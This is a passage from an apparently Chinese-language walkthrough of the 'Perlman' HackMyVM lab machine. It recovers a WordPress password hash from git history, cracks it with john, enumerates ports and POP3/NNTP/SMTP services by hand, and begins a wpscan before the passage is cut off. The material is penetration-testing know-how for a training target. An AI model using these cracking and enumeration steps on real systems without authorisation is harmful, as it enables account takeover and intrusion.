SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 *\/;\n\/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE=&#039;NO_AUTO_VALUE_ON_ZERO&#039; *\/;\n\/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 *\/;\n\n--\n-- Table structure for table `users`\n--\n\nDROP TABLE IF EXISTS `users`;\n\/*!40101 SET @saved_cs_client     = @@character_set_client *\/;\n\/*!40101 SET character_set_client = utf8 *\/;\nCREATE TABLE `users` (\n  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,\n  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT &#039;&#039;,\n  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT &#039;&#039;,\n  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT &#039;&#039;,\n  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 
&#039;&#039;,\n  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT &#039;&#039;,\n  `user_registered` datetime NOT NULL DEFAULT &#039;0000-00-00 00:00:00&#039;,\n  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT &#039;&#039;,\n  `user_status` int(11) NOT NULL DEFAULT 0,\n  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT &#039;&#039;,\n  PRIMARY KEY (`ID`),\n  KEY `user_login_key` (`user_login`),\n  KEY `user_nicename` (`user_nicename`),\n  KEY `user_email` (`user_email`)\n) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n--\n-- Dumping data for table `users`\n--\n\nLOCK TABLES `users` WRITE;\n\/*!40000 ALTER TABLE `users` DISABLE KEYS *\/;\nINSERT INTO `users` VALUES (1,&#039;webmaster&#039;,&#039;&#039;,&#039;webmaster&#039;,&#039;webmaster@perlman.hmv&#039;,&#039;http:\/\/perlman.hmv&#039;,&#039;2022-07-03 16:23:02&#039;,&#039;&#039;,0,&#039;webmaster&#039;);\n\/*!40000 ALTER TABLE `users` ENABLE KEYS *\/;\nUNLOCK TABLES;\n\/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;\n\n\/*!40101 SET SQL_MODE=@OLD_SQL_MODE *\/;\n\/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS *\/;\n\/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS *\/;\n\/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION *\/;\n\/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES *\/;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176]\n\u2514\u2500$ cd db           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxr-xr-x 2 kali kali 4096 Jul 10 22:00 .\ndrwxr-xr-x 4 kali kali 4096 Jul 10 22:00 ..\n-rw-r--r-- 1 kali kali  305 Jul 10 22:00 
index.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ cat index.php    \n&lt;?php\n\n    error_reporting(0);\n    $allow = [&#039;perlman&#039;, &#039;perlman.htb&#039;];\n    if(!isset($_SERVER[&#039;HTTP_X_FORWARDED_FOR&#039;]) || !in_array($_SERVER[&#039;HTTP_X_FORWARDED_FOR&#039;], $allow)) {\n        die(&#039;Access allowed only for perlman.htb staff.&#039;);\n    } else {\n       header(&#039;location: old_backup_2009&#039;);\n\n    }\n\n?&gt;<\/code><\/pre>\n<p>\u627e\u5230\u4e86\u4e00\u4e2a\u57df\u540d\u89e3\u6790<code>http:\/\/perlman.hmv<\/code>\u4ee5\u53ca\u627e\u4e0d\u5230\u5bc6\u7801\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5386\u53f2\u6570\u636e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git log                                              \ncommit 40f3ff4215a1102c35447533676797ec06f8ffd9 (HEAD -&gt; master)\nAuthor: root &lt;root@perlman&gt;\nDate:   Sat Sep 10 15:30:23 2022 +0200\n\n    wp\n\ncommit 0cf1c46eefb7c5ebaf8d066e0b5cd730d7c8c58f\nAuthor: root &lt;root@perlman&gt;\nDate:   Sat Sep 10 15:29:12 2022 +0200\n\n    config\n\ncommit d29e54424558256922c83396a320ff7fec2a81dc\nAuthor: root &lt;root@perlman&gt;\nDate:   Sat Sep 10 15:28:36 2022 +0200\n\n    perlman\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git diff 40f3ff 0cf1c4\ndiff --git a\/db\/index.php b\/db\/index.php\ndeleted file mode 100644\nindex 11c0725..0000000\n--- a\/db\/index.php\n+++ \/dev\/null\n@@ -1,12 +0,0 @@\n-&lt;?php\n-\n-    error_reporting(0);\n-    $allow = [&#039;perlman&#039;, &#039;perlman.htb&#039;];\n-    if(!isset($_SERVER[&#039;HTTP_X_FORWARDED_FOR&#039;]) || !in_array($_SERVER[&#039;HTTP_X_FORWARDED_FOR&#039;], $allow)) {\n-        die(&#039;Access allowed only for perlman.htb staff.&#039;);\n-    } else {\n-       header(&#039;location: old_backup_2009&#039;);\n-\n- 
   }\n-\n-?&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman\/192.168.0.176\/db]\n\u2514\u2500$ git diff 40f3ff d29e54\ndiff --git a\/db\/index.php b\/db\/index.php\ndeleted file mode 100644\nindex 11c0725..0000000\n--- a\/db\/index.php\n+++ \/dev\/null\n@@ -1,12 +0,0 @@\n-&lt;?php\n-\n-    error_reporting(0);\n-    $allow = [&#039;perlman&#039;, &#039;perlman.htb&#039;];\n-    if(!isset($_SERVER[&#039;HTTP_X_FORWARDED_FOR&#039;]) || !in_array($_SERVER[&#039;HTTP_X_FORWARDED_FOR&#039;], $allow)) {\n-        die(&#039;Access allowed only for perlman.htb staff.&#039;);\n-    } else {\n-       header(&#039;location: old_backup_2009&#039;);\n-\n-    }\n-\n-?&gt;\ndiff --git a\/users.sql b\/users.sql\nindex 7fe7dd3..572f66c 100644\n--- a\/users.sql\n+++ b\/users.sql\n@@ -46,7 +46,7 @@ CREATE TABLE `users` (\n\n LOCK TABLES `users` WRITE;\n \/*!40000 ALTER TABLE `users` DISABLE KEYS *\/;\n-INSERT INTO `users` VALUES (1,&#039;webmaster&#039;,&#039;&#039;,&#039;webmaster&#039;,&#039;webmaster@perlman.hmv&#039;,&#039;http:\/\/perlman.hmv&#039;,&#039;2022-07-03 16:23:02&#039;,&#039;&#039;,0,&#039;webmaster&#039;);\n+INSERT INTO `users` VALUES (1,&#039;webmaster&#039;,&#039;$P$BCaMhRZQp\/mi0nyIVVPS6u1EU8sTCR\/&#039;,&#039;webmaster&#039;,&#039;webmaster@perlman.hmv&#039;,&#039;http:\/\/perlman.hmv&#039;,&#039;2022-07-03 16:23:02&#039;,&#039;&#039;,0,&#039;webmaster&#039;);\n \/*!40000 ALTER TABLE `users` ENABLE KEYS *\/;\n UNLOCK TABLES;\n \/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;<\/code><\/pre>\n<p>\u627e\u5230\u4e86 hash\uff0c\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ echo &#039;$P$BCaMhRZQp\/mi0nyIVVPS6u1EU8sTCR\/&#039; &gt; hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ john hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 128\/128 SSE2 4x3])\nCost 1 (iteration count) is 
8192 for all loaded hashes\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nProceeding with wordlist:\/usr\/share\/john\/password.lst\ncookie           (?)     \n1g 0:00:00:00 DONE 2\/3 (2024-07-10 22:11) 3.571g\/s 1371p\/s 1371c\/s 1371C\/s purple..larry\nUse the &quot;--show --format=phpass&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>\u6dfb\u52a0\u4e00\u4e0b\u57df\u540d\u89e3\u6790\u4ee5\u53ca\u5c1d\u8bd5\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-text\">192.168.0.176   perlman.hmv<\/code><\/pre>\n<p>\u518d\u6b21\u626b\u63cf\u4e00\u4e0b\u8bd5\u8bd5\uff0c\u53d1\u73b0\u8fd8\u662f\u4e00\u65e0\u6240\u83b7\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ gobuster dir -u http:\/\/perlman.hmv -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html \n\/.php                 (Status: 403) [Size: 276]\n\/index.html           (Status: 200) [Size: 47426]\n\/.html                (Status: 403) [Size: 276]\n\/images               (Status: 301) [Size: 311] [--&gt; http:\/\/perlman.hmv\/images\/]\n\/css                  (Status: 301) [Size: 308] [--&gt; http:\/\/perlman.hmv\/css\/]\n\/privacy-policy.html  (Status: 200) [Size: 25624]\n\/js                   (Status: 301) [Size: 307] [--&gt; http:\/\/perlman.hmv\/js\/]\n\/terms-conditions.html (Status: 200) [Size: 18494]\n\/.php                 (Status: 403) [Size: 276]\n\/.html                (Status: 403) [Size: 276]\n\/server-status        (Status: 403) [Size: 276]<\/code><\/pre>\n<h3>\u654f\u611f\u7aef\u53e3\u63a2\u6d4b<\/h3>\n<p>\u770b\u4e00\u4e0b\u5176\u4ed6\u7aef\u53e3\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nmap 192.168.0.176 | grep open\n22\/tcp  open  ssh\n25\/tcp  open  smtp\n80\/tcp  open  http\n110\/tcp open  pop3\n119\/tcp open  nntp\n995\/tcp open  pop3s<\/code><\/pre>\n<p>\u5148\u5c1d\u8bd5 ssh\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ ssh webmaster@$IP      \nThe authenticity of host &#039;192.168.0.176 (192.168.0.176)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:mj3kS8pBIwV9crKMRcQXj7whxG9JknAzXwJQeohBVPg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.176&#039; (ED25519) to the list of known hosts.\nwebmaster@192.168.0.176: Permission denied (publickey).<\/code><\/pre>\n<p>25 \u7aef\u53e3\u5f00\u653e\u7684\u662f\u90ae\u4ef6\u7cfb\u7edf\uff0c\u6682\u65f6\u5148\u4e0d\u770b\uff0c\u770b\u4e00\u4e0b 110 \u7aef\u53e3\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 110 \n(UNKNOWN) [192.168.0.176] 110 (pop3) open\n+OK Dovecot (Debian) ready.\nUSER webmaster\n+OK\nPASS cookie\n-ERR [AUTH] Authentication failed.\nSTAT\n-ERR Unknown command.\n^C<\/code><\/pre>\n<p>\u5bc6\u7801\u4e0d\u6b63\u786e\uff0c\u518d\u770b\u770b\u522b\u7684\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 995\n(UNKNOWN) [192.168.0.176] 995 (pop3s) open\nUSER 
webmaster<\/code><\/pre>\n<p>\u76f4\u63a5\u5f39\u51fa\u6765\u4e86\uff0c\u6700\u540e\u770b\u4e00\u4e0b<code>119<\/code>\u7aef\u53e3\uff1a<\/p>\n<blockquote>\n<p><strong>\u7f51\u7edc\u65b0\u95fb\u4f20\u8f93\u534f\u8bae<\/strong>( NNTP <strong>)<\/strong>\u662f\u4e00\u79cd\u5e94\u7528\u534f\u8bae)\uff0c\u7528\u4e8e\u5728\u65b0\u95fb\u670d\u52a1\u5668\u4e4b\u95f4\u4f20\u8f93Usenet\u65b0\u95fb\u6587\u7ae0 ( <em>netnews<\/em> ) \uff0c\u4ee5\u53ca\u4f9b\u6700\u7ec8\u7528\u6237\u5ba2\u6237\u7aef\u5e94\u7528\u7a0b\u5e8f\u9605\u8bfb\/\u53d1\u5e03\u6587\u7ae0\u3002<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746962.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746962.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711103302124\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u53c2\u8003\uff1a<\/p>\n<p><a href=\"https:\/\/0xffsec.com\/handbook\/services\/nntp\/\">https:\/\/0xffsec.com\/handbook\/services\/nntp\/<\/a><\/p>\n<p><a href=\"https:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/119_nntp\/\">https:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/119_nntp\/<\/a><\/p>\n<p>\u8054\u60f3\u5230\uff1a<code>webmaster@perlman.hmv<\/code><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 119\n(UNKNOWN) [192.168.0.176] 119 (nntp) open\n200 server.example.net InterNetNews NNRP server INN 2.6.4 ready 
(posting ok)\nLIST\n215 Newsgroups in form &quot;group high low status&quot;\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000003 y\n.\nHELP\n100 Legal commands\n  ARTICLE [message-ID|number]\n  AUTHINFO USER name|PASS password|SASL mechanism [initial-response]|GENERIC program [argument ...]\n  BODY [message-ID|number]\n  CAPABILITIES [keyword]\n  COMPRESS DEFLATE\n  DATE\n  GROUP newsgroup\n  HDR header [message-ID|range]\n  HEAD [message-ID|number]\n  HELP\n  IHAVE message-ID\n  LAST\n  LIST [ACTIVE [wildmat]|ACTIVE.TIMES [wildmat]|COUNTS [wildmat]|DISTRIB.PATS|DISTRIBUTIONS|HEADERS [MSGID|RANGE]|MODERATORS|MOTD|NEWSGROUPS [wildmat]|OVERVIEW.FMT|SUBSCRIPTIONS [wildmat]]\n  LISTGROUP [newsgroup [range]]\n  MODE READER\n  NEWGROUPS [yy]yymmdd hhmmss [GMT]\n  NEWNEWS wildmat [yy]yymmdd hhmmss [GMT]\n  NEXT\n  OVER [range]\n  POST\n  QUIT\n  STARTTLS\n  STAT [message-ID|number]\n  XGTITLE [wildmat]\n  XHDR header [message-ID|range]\n  XOVER [range]\n  XPAT header message-ID|range pattern [pattern ...]\nReport problems to &lt;usenet@perlman.hmv&gt;.\n.\nGROUP\n501 Syntax is:  GROUP newsgroup\nCAPABILITIES\n101 Capability list:\nVERSION 2\nIMPLEMENTATION INN 2.6.4\nAUTHINFO SASL\nCOMPRESS DEFLATE\nHDR\nLIST ACTIVE ACTIVE.TIMES COUNTS DISTRIB.PATS DISTRIBUTIONS HEADERS MODERATORS MOTD NEWSGROUPS OVERVIEW.FMT SUBSCRIPTIONS\nOVER\nPOST\nREADER\nSASL DIGEST-MD5 CRAM-MD5 NTLM\nSTARTTLS\nXPAT\n.\nSELECT perlman.hmv                                                \n500 What?\nLIST\n215 Newsgroups in form &quot;group high low status&quot;\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 
n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000003 y\n.\nSELECT junk\n500 What?\nGROUP perlman.hmv\n211 0 3 2 perlman.hmv<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u6709\u6587\u7ae0\uff0c\u67e5\u770b\u4e00\u4e0b\u6587\u6863\uff1a<a href=\"https:\/\/www.ietf.org\/rfc\/rfc977.txt\">https:\/\/www.ietf.org\/rfc\/rfc977.txt<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746963.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407111746963.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240711110004465\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">POST\n340 Ok, recommended message-ID &lt;v6ni8h$1bb$1@perlman.hmv&gt;<\/code><\/pre>\n<p>\u5f97\u5230\u4fe1\u606f\uff01\u4f46\u662f\u67e5\u770bwp\uff0c\u53d1\u73b0\u9700\u8981\u5f97\u5230\u7684\u662f\u53e6\u4e00\u4e2a\u4fe1\u606f\uff0c\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff1a<\/p>\n<blockquote>\n<p>\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u56e0\u4e3a\u91cd\u65b0\u5bfc\u5165\u7684\u65f6\u5019\u9009\u62e9\u4e86\u4e3a\u6240\u6709\u7f51\u5361\u91cd\u65b0\u751f\u6210MAC\u5730\u5740\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 119\n(UNKNOWN) [192.168.0.136] 119 (nntp) open\n200 server.example.net InterNetNews NNRP server INN 
2.6.4 ready (posting ok)\nHELP\n100 Legal commands\n  ARTICLE [message-ID|number]\n  AUTHINFO USER name|PASS password|SASL mechanism [initial-response]|GENERIC program [argument ...]\n  BODY [message-ID|number]\n  CAPABILITIES [keyword]\n  COMPRESS DEFLATE\n  DATE\n  GROUP newsgroup\n  HDR header [message-ID|range]\n  HEAD [message-ID|number]\n  HELP\n  IHAVE message-ID\n  LAST\n  LIST [ACTIVE [wildmat]|ACTIVE.TIMES [wildmat]|COUNTS [wildmat]|DISTRIB.PATS|DISTRIBUTIONS|HEADERS [MSGID|RANGE]|MODERATORS|MOTD|NEWSGROUPS [wildmat]|OVERVIEW.FMT|SUBSCRIPTIONS [wildmat]]\n  LISTGROUP [newsgroup [range]]\n  MODE READER\n  NEWGROUPS [yy]yymmdd hhmmss [GMT]\n  NEWNEWS wildmat [yy]yymmdd hhmmss [GMT]\n  NEXT\n  OVER [range]\n  POST\n  QUIT\n  STARTTLS\n  STAT [message-ID|number]\n  XGTITLE [wildmat]\n  XHDR header [message-ID|range]\n  XOVER [range]\n  XPAT header message-ID|range pattern [pattern ...]\nReport problems to &lt;usenet@perlman.hmv&gt;.\n.\nLIST\n215 Newsgroups in form &quot;group high low status&quot;\ncontrol 0000000000 0000000001 n\ncontrol.cancel 0000000000 0000000001 n\ncontrol.checkgroups 0000000000 0000000001 n\ncontrol.newgroup 0000000000 0000000001 n\ncontrol.rmgroup 0000000000 0000000001 n\njunk 0000000000 0000000001 n\nlocal.general 0000000000 0000000001 y\nlocal.test 0000000000 0000000001 y\nperlman.hmv 0000000002 0000000001 y\n.\nGROUP perlman.hmv\n211 1 1 2 perlman.hmv\nARTICLE 2\n220 2 &lt;tfi784$403$1@perlman.hmv&gt; article\nPath: server.example.net!.POSTED.192.168.0.27!not-for-mail\nFrom: rita &lt;rita@perlman.hmv&gt;\nNewsgroups: perlman.hmv\nSubject: Whats up ?!\nDate: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)\nOrganization: A poorly-installed InterNetNews site\nMessage-ID: &lt;tfi784$403$1@perlman.hmv&gt;\nMime-Version: 1.0\nContent-Type: text\/plain; charset=UTF-8\nContent-Transfer-Encoding: 8bit\nInjection-Date: Sat, 10 Sep 2022 14:33:40 -0000 (UTC)\nInjection-Info: perlman.hmv; posting-host=&quot;192.168.0.27&quot;;\n        
logging-data=&quot;4099&quot;; mail-complaints-to=&quot;usenet@perlman.hmv&quot;\nUser-Agent: Pan\/0.151 (Butcha; a6f6327)\nXref: server.example.net perlman.hmv:2\n\nSo cool to have installed a newsgroup server! \nSee you soon kissss\n.<\/code><\/pre>\n<p>\u5f97\u5230\u7528\u6237\u540d <code>rita<\/code>\uff0c\u4ee5\u53ca\u90ae\u7bb1 <code>rita@perlman.hmv<\/code>\u3002<\/p>\n<p>\u91cd\u65b0\u8bbf\u95ee\u524d\u9762\u7684\u5176\u4ed6\u7aef\u53e3\uff1a<\/p>\n<p><a href=\"https:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/25_smtp\/\">https:\/\/cheatsheet.haax.fr\/network\/services-enumeration\/25_smtp\/<\/a><\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-smtp#banner-grabbing-basic-connection\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-smtp#banner-grabbing-basic-connection<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 25\n(UNKNOWN) [192.168.0.136] 25 (smtp) open\n220 perlman.hmv ESMTP Postfix (Debian\/GNU)\nHELO perlman.hmv\n250 perlman.hmv\nVRFY rita\n252 2.0.0 rita\nMAIL FROM:rita@perlman.hmv\n250 2.1.0 Ok\nRCPT TO:hack@hack.com\n250 2.1.5 Ok\nDATA\n354 End data with &lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;\n.\n250 2.0.0 Ok: queued as D6E85415F8\nquit\n221 2.0.0 Bye<\/code><\/pre>\n<p>\u7136\u540e\u770b\u4e00\u4e0b\u90a3\u4e2a\u63a5\u90ae\u7bb1\u7684\u7aef\u53e3\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop#banner-grabbing\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-pop#banner-grabbing<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ nc -nv $IP 110\n(UNKNOWN) [192.168.0.136] 110 (pop3) open\n+OK Dovecot (Debian) ready.\nUSER rita\n+OK\nPASS cookie\n+OK Logged in.\nLIST\n+OK 1 messages:\n1 2390\n.\nRETR 1\n+OK 2390 octets\nReturn-Path: &lt;&gt;\nX-Original-To: 
rita@perlman.hmv\nDelivered-To: rita@perlman.hmv\nReceived: by perlman.hmv (Postfix)\n        id 9C18441616; Thu, 11 Jul 2024 08:55:41 +0200 (CEST)\nDate: Thu, 11 Jul 2024 08:55:41 +0200 (CEST)\nFrom: MAILER-DAEMON@perlman.hmv (Mail Delivery System)\nSubject: Undelivered Mail Returned to Sender\nTo: rita@perlman.hmv\nAuto-Submitted: auto-replied\nMIME-Version: 1.0\nContent-Type: multipart\/report; report-type=delivery-status;\n        boundary=&quot;D6E85415F8.1720680941\/perlman.hmv&quot;\nContent-Transfer-Encoding: 8bit\nMessage-Id: &lt;20240711065541.9C18441616@perlman.hmv&gt;\n\nThis is a MIME-encapsulated message.\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Notification\nContent-Type: text\/plain; charset=utf-8\nContent-Transfer-Encoding: 8bit\n\n           Charset: us-ascii\n           
From: MAILER-DAEMON (mailer@itzhak.perlman.hmv)\n           Subject: Undelivered Mail Returned to Sender\n           Postmaster-Subject: Postmaster Copy: Undelivered Mail\n\n           This is the mail system at host perlman.hmv.\n\n           I&#039;m sorry to have to inform you that your message could not\n           be delivered to one or more recipients. It&#039;s attached below.\n\n           For further assistance, please send mail to postmaster.\n\n           If you do so, please include this problem report. You can\n           delete your own text from the attached returned message.\n\n                              The mail system\n           EOF\n\n&lt;hack@hack.com&gt;: mail for hack.com loops back to myself\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Delivery report\nContent-Type: message\/delivery-status\n\nReporting-MTA: dns; perlman.hmv\nX-Postfix-Queue-ID: D6E85415F8\nX-Postfix-Sender: rfc822; rita@perlman.hmv\nArrival-Date: Thu, 11 Jul 2024 08:55:01 +0200 (CEST)\n\nFinal-Recipient: rfc822; hack@hack.com\nOriginal-Recipient: rfc822;hack@hack.com\nAction: failed\nStatus: 5.4.6\nDiagnostic-Code: X-Postfix; mail for hack.com loops back to myself\n\n--D6E85415F8.1720680941\/perlman.hmv\nContent-Description: Undelivered Message\nContent-Type: message\/rfc822\nContent-Transfer-Encoding: 8bit\n\nReturn-Path: &lt;rita@perlman.hmv&gt;\nReceived: from perlman.hmv (kali [192.168.0.143])\n        by perlman.hmv (Postfix) with SMTP id D6E85415F8\n        for &lt;hack@hack.com&gt;; Thu, 11 Jul 2024 08:55:01 +0200 (CEST)\n\n--D6E85415F8.1720680941\/perlman.hmv--\n.<\/code><\/pre>\n<h3>wordpress\u6d4b\u8bd5<\/h3>\n<p>\u627e\u5230\u4e00\u4e2a\u57df\u540d\uff1a<code>itzhak.perlman.hmv<\/code><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ whatweb http:\/\/itzhak.perlman.hmv\nhttp:\/\/itzhak.perlman.hmv [200 OK] Apache[2.4.54], Bootstrap[6.0.2], Cookies[PHPSESSID], 
Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.54 (Debian)], IP[192.168.0.136], JQuery[3.6.0], MetaGenerator[WordPress 6.0.2], PoweredBy[--], Script, Title[Computer store ! &amp;#8211; Just another WordPress site], UncommonHeaders[link], WordPress[6.0.2]<\/code><\/pre>\n<p>\u53d1\u73b0\u662f\u4e00\u4e2a<code>wordpress<\/code>\u7ad9\u70b9\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ wpscan --url http:\/\/itzhak.perlman.hmv --api-token XXXXX\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  